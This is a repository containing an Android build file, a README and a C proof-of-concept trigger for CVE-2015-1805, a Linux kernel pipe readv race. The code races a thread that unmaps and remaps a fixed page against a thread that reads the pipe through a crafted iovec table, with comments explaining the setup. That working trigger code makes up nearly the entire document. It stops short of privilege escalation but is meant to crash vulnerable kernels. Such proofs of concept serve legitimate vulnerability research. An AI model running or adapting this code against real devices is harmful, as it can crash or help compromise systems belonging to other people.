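├── CVE-2015-1805
├── Android.mk
└── CVE-2015-1805.c
└── README.md

/CVE-2015-1805/Android.mk:
--------------------------------------------------------------------------------
LOCAL_PATH := $(call my-dir)

include $(CLEAR_VARS)
LOCAL_MODULE := CVE-2015-1805
LOCAL_CFLAGS += -pie -fPIE
LOCAL_LDFLAGS += -pie -fPIE
LOCAL_SRC_FILES := CVE-2015-1805.c
include $(BUILD_EXECUTABLE)

--------------------------------------------------------------------------------
/CVE-2015-1805/CVE-2015-1805.c:
--------------------------------------------------------------------------------
/*
 * Written by 少仲
 * email: panyu6325@gmail.com
 *
 * Trigger for CVE-2015-1805 (Linux fs/pipe.c I/O-vector handling).
 *
 * What the program does: it creates a non-blocking pipe, builds a 256-entry
 * iovec table of one shared anonymous page each, points entry 7 at a page
 * mapped at a fixed user address, and then loops forever: write one page
 * into the pipe, start a thread that unmaps and re-maps the fixed page, and
 * start a thread that readv()s the pipe through the table, so the kernel's
 * copy to user space can fault in the middle of that iovec entry. There is
 * no success check and the loop never exits on its own; what a vulnerable
 * kernel does after the fault is not demonstrated by this file.
 *
 * Review notes against the listing this was reconstructed from (which has
 * the shape of decompiler output: a `while (map_times == 7)` entered via
 * `goto`, a `struct payload` overlay on the iovec buffer):
 *   - the #include lines had lost their header names; restored.
 *   - the per-page address table was written through `&buf + i` on a
 *     single `void *` local, i.e. up to 255 out-of-bounds stack writes, and
 *     read back as `int` (truncates pointers on 64-bit); it is a real
 *     `void *[256]` now.
 *   - write(pipe, buf, 4096) was issued with buf == NULL, so it failed with
 *     EFAULT and the pipe was never filled; a page-sized buffer is used.
 *   - the iovec table was laid out by hand with 32-bit ARM offsets (8-byte
 *     entries, `+4` for iov_len); it is a `struct iovec` array now, which
 *     is the same bytes on 32-bit and also correct on 64-bit.
 *   - mmap/fcntl flags 50, 33 and 0x800 are the x86/ARM values of
 *     MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, MAP_SHARED|MAP_ANONYMOUS and
 *     O_NONBLOCK; the names are used so other architectures get the right
 *     bits.
 *   - thread functions were declared `void *(const char *)` and the results
 *     of pthread_create()/fcntl()/the fixed mmap were not all checked; the
 *     failure paths now release what they acquired.
 */
#define _GNU_SOURCE /* MAP_ANONYMOUS and POSIX prototypes under -std=c11 */

#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
/* Strict-ISO header modes hide the name. 0x20 is the x86/ARM value the
 * original listing hard-coded inside its mmap flags (50 = 0x32, 33 = 0x21);
 * an architecture with a different value must expose the macro itself. */
#define MAP_ANONYMOUS 0x20
#endif

enum {
    PAGE_BYTES    = 0x1000, /* size of every mapping and of each pipe write */
    MAP_COUNT     = 256,    /* iovec entries handed to readv(); one page each */
    FIXED_SLOT    = 7,      /* iovec entry that points at the fixed page */
    SMALL_IOV_LEN = 16,     /* length of every ordinary entry */
    PRE_FIXED_LEN = 0xA0,   /* length of the entry just before the fixed one */
    FIXED_IOV_LEN = 0x10    /* length of the fixed-page entry */
};

/* User address that is unmapped and re-mapped while readv() copies into it. */
#define FIXED_PAGE ((void *)0x45678000)

int pipe_fd[2];

/* The iovec table readv() walks; replaces `void *g_base` + hand-packed
 * 8-byte entries. Owned by trigger(), NULL outside its lifetime. */
static struct iovec *g_iov;

/* Zero page written into the pipe on every iteration. The original passed a
 * NULL pointer here, which made write() fail with EFAULT every time. */
static char page_buf[PAGE_BYTES];

/*
 * Racing thread A: pull FIXED_PAGE out from under the kernel's copy and map
 * a fresh private page in its place.
 * Returns the mmap() result; the caller ignores it.
 */
static void *remap_fixed_page(void *unused)
{
    (void)unused;
    munmap(FIXED_PAGE, PAGE_BYTES);
    return mmap(FIXED_PAGE, PAGE_BYTES, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
}

/*
 * Racing thread B: drain the pipe through the iovec table. The kernel copies
 * into each entry in turn, including the one at FIXED_PAGE.
 * Returns readv()'s result cast to a pointer; the caller ignores it.
 */
static void *readv_pipe(void *unused)
{
    (void)unused;
    ssize_t got = readv(pipe_fd[0], g_iov, MAP_COUNT);
    return (void *)(intptr_t)got;
}

/*
 * Build the pipe and the iovec table, then race the two threads forever.
 *
 * Returns -1 when a setup step fails (after releasing what was acquired) or
 * when a thread can no longer be created; on the intended path it does not
 * return.
 */
int trigger(void)
{
    static const char *const spinner[4] = { "\b-", "\b\\", "\b|", "\b/" };
    void *maps[MAP_COUNT] = { 0 }; /* pages to unmap on the way out */
    void *fixed = MAP_FAILED;
    int ret = -1;
    int i;

    if (pipe(pipe_fd) < 0) {
        puts("pipe failed...\n");
        return ret;
    }

    /* Both ends non-blocking so neither a full nor an empty pipe can park a
     * thread and stall the race. */
    if (fcntl(pipe_fd[0], F_SETFL, O_NONBLOCK) < 0 ||
        fcntl(pipe_fd[1], F_SETFL, O_NONBLOCK) < 0) {
        puts("fcntl failed...\n");
        goto close_pipe;
    }

    g_iov = calloc(MAP_COUNT, sizeof *g_iov);
    if (!g_iov) {
        puts("malloc failed...\n");
        goto close_pipe;
    }

    fixed = mmap(FIXED_PAGE, PAGE_BYTES, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
    if (fixed == MAP_FAILED) {
        puts(" mmap fixed addr failed...\n");
        goto free_iov;
    }

    /* One shared anonymous page per entry. Slot FIXED_SLOT is left empty
     * here and filled with the fixed page below (the original skipped index
     * 7 via its `while (map_times == 7)` construct). */
    for (i = 0; i < MAP_COUNT; i++) {
        void *page;

        if (i == FIXED_SLOT)
            continue;
        page = mmap(NULL, PAGE_BYTES, PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED) {
            printf("mmap failed in %d times\n", i);
            goto unmap_all;
        }
        maps[i] = page;
        g_iov[i].iov_base = page;
        g_iov[i].iov_len = SMALL_IOV_LEN;
    }

    /* Same bytes the original wrote through its `struct payload` overlay:
     * total_len at offset 52 is iov[6].iov_len, base/len at 56/60 are
     * iov[7] on a 32-bit target. */
    g_iov[FIXED_SLOT - 1].iov_len = PRE_FIXED_LEN;
    g_iov[FIXED_SLOT].iov_base = fixed;
    g_iov[FIXED_SLOT].iov_len = FIXED_IOV_LEN;

    puts("------------------------------------\n");
    puts(" CVE-2015-1805 \n");
    puts("------------------------------------\n");

    /* Race loop: refill the pipe, then run the remap thread and the readv
     * thread side by side and wait for both. Spinner strings are the
     * original's; note puts() appends '\n', so the '\b' erases nothing. */
    for (unsigned n = 0;; n++) {
        pthread_t remapper, reader;

        puts(spinner[n & 3]);
        (void)write(pipe_fd[1], page_buf, PAGE_BYTES); /* EAGAIN on a full pipe is fine */

        if (pthread_create(&remapper, NULL, remap_fixed_page, NULL) != 0) {
            puts("pthread_create failed...\n");
            break;
        }
        if (pthread_create(&reader, NULL, readv_pipe, NULL) != 0) {
            puts("pthread_create failed...\n");
            pthread_join(remapper, NULL);
            break;
        }
        pthread_join(remapper, NULL);
        pthread_join(reader, NULL);
    }

unmap_all:
    for (i = 0; i < MAP_COUNT; i++) {
        if (maps[i])
            munmap(maps[i], PAGE_BYTES);
    }
    munmap(fixed, PAGE_BYTES);
free_iov:
    free(g_iov);
    g_iov = NULL;
close_pipe:
    close(pipe_fd[0]);
    close(pipe_fd[1]);
    return ret;
}

/* Entry point: runs the trigger; its exit status is trigger()'s return. */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    return trigger();
}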
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2015-1805 PoC

Trigger program for CVE-2015-1805 (Linux `fs/pipe.c` I/O-vector handling), built as an Android PIE executable via `CVE-2015-1805/Android.mk`. It fills a pipe and then loops forever, racing a thread that unmaps and re-maps a fixed user page against a thread that `readv()`s from the pipe with an iovec entry pointing at that page. It performs no success check and never exits on its own; run it only on a throw-away device or VM whose kernel you intend to crash.
--------------------------------------------------------------------------------